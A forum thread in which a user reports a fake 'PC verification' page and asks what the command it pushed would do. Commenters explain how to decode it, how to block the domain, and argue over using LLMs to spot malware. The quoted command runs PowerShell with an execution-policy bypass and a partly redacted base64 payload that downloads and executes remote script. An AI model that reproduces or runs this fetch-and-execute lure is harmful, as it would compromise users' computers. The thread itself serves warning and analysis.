Yeah, don’t put this in, but can anyone give me an idea of what they were trying to do? The website was `https:\howchoo.\com\3dprinting\updating-octoprint`
and it used a real-looking PC verification screen to try to get me to put this in Run:
`conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1`
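For anyone curious: the blob after `/e` is just base64 of UTF-16LE text (that’s what PowerShell’s `-EncodedCommand` expects), so you can read it without ever executing it. A minimal sketch — the encoded string below is a harmless stand-in for illustration, NOT the payload from the post:

```python
import base64

# PowerShell's /e (-EncodedCommand) takes base64-encoded UTF-16LE text.
# Harmless stand-in string for illustration -- NOT the payload above:
sample = base64.b64encode("Write-Host 'demo'".encode("utf-16-le")).decode()

# Decoding is the reverse: base64-decode, then interpret as UTF-16LE.
decoded = base64.b64decode(sample).decode("utf-16-le")
print(decoded)  # Write-Host 'demo'
```

Decoding the payload this way just shows you the script text; it never runs anything.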
One of the moments that AI can be good. I asked Google Gemini.
Edit: added backticks to URLs
Could you surround the links with backticks to make them code blocks? That would prevent someone from accidentally clicking it
Doesn’t really matter if anyone clicks it; you would need to execute the script to be compromised.
Sure, thanks for the heads up
You needed an LLM to figure out this was malware?! Sweet jesus, we’re well and truly fucked.
Right? Tech literacy is dead and smartphones killed it
deleted by creator
It did speed up the process of looking it up and confirming that it is malware.
LLMs are decent at pattern recognition, and so it pulled up relevant keywords associated with each part of the command. You can then look up the important section to verify. It’s also something that a simple and locally hosted LLM could do.
I wouldn’t run a random command, but confirming that it is malware would let me take further action: block the site, report it, or help a family member who already ran the command.
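For the “block the site” part on a single machine, a hosts-file entry null-routing the domain is usually enough. The domain here is the one the base64 in the original post decodes to fetching (mastraw.top); the path shown is the Windows one:

```
# C:\Windows\System32\drivers\etc\hosts  (edit as Administrator)
0.0.0.0 mastraw.top
```

A DNS-level block on the router or a Pi-hole covers every device at once, if you’re helping a whole household.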
Or you can just know that if some rando site is asking you to run cmd and powershell as some sort of authentication scheme, you’re about to get your shit fucked up. The specifics literally don’t matter, this is behavior no legit site would request you to do.
That’s enough for me to not run it, but proving it can be helpful in some contexts, such as this thread.
“This is malware because no legit site would authenticate like that” vs. “this is malware, it will do XYZ”
Okay but pretty much any malware is going to follow those same steps - they’re what makes it malware. The LLM doesn’t “prove” anything - it’s not examining the executable, it’s not setting up a VM and doing deep packet analysis to see how the malware operates. It’s just parroting back the fact this is malware with details seeded from the prompt. This is like yelling into a canyon and “proving” someone is stuck in the canyon and yelling because you heard an echo.
No one should be using an LLM as a security backstop. It’s only going to catch the things that have already been seen before, and the minute a bad actor introduces something the least bit novel in the attack, the LLM is confidently going to say it isn’t malware because it hasn’t seen it before. A simple web search would have turned up essentially the same information and used only a small fraction of the resources.
That’s not what I meant though, I said that it speeds up the process of looking it up. It’s about as good as an unreliable peer that tells you what it thinks is happening. I can then research it myself based on the keywords that it mentions.
It is similar to a web search, but with how bad search results are these days (a large part because of other people making LLM generated garbage articles), I find that asking a locally hosted LLM will give me a better starting point. Since it’s running on my own simple hardware, I’m not as worried about the resource cost compared to the tech companies’ ones.
I agree with everything else you’ve said though
Chill out, we all know it was malware, but LLMs are actually a tool in this use case to find out more about it without executing the code.
I don’t like AI any more than the next guy, but this is just a silly response
Fucking priceless. The LLM didn’t explain anything beyond what was obvious from just looking at it. It was trying to get you to run a privileged executable. The LLM doesn’t have a clue what the executable does, and even admits that. So why bother asking it?
Let’s take the tech out of it. You’re at a restaurant and you’re given a beverage in a glass, but you can see the glass is dirty with food residue. Do you have to consult an LLM to know not to drink out of it? Does it matter what sort of food residue it is? Of course not.
I swear people’s critical thinking skills are non-existent or in complete atrophy these days. The only thing of potential interest is the executable itself and if you’re posting this question, I’m not sure any explanation or details would mean anything to you.
Yeah but the LLM isn’t the one making a scene
<clutches pearls> Making a scene?! Oh no! Have I shattered the fragile Lemmy decorum with my boorish behavior? How dreadful!
Listen, if you want to believe an LLM has anything useful to say about the malware you’re presented with on dodgy sites, go for it.
And I’ll be free to think you’re a prime example for why we should start requiring a “drivers license” to get on a computer. To each their own.
Alright buddy
Not everyone can understand that it runs a privileged executable.
If it’s malware, it - by definition - is going to need to run a privileged executable. That’s the “ware” in “malware”. The LLM is just explaining the specific method they’re attempting to use - which again should be obvious both by the nature of the actions it’s requesting from the user as well as the specific text it’s asking to be run. It explicitly says it doesn’t know anything about the executable that’s being run, so it really isn’t offering anything particularly useful or actionable - just wasting resources.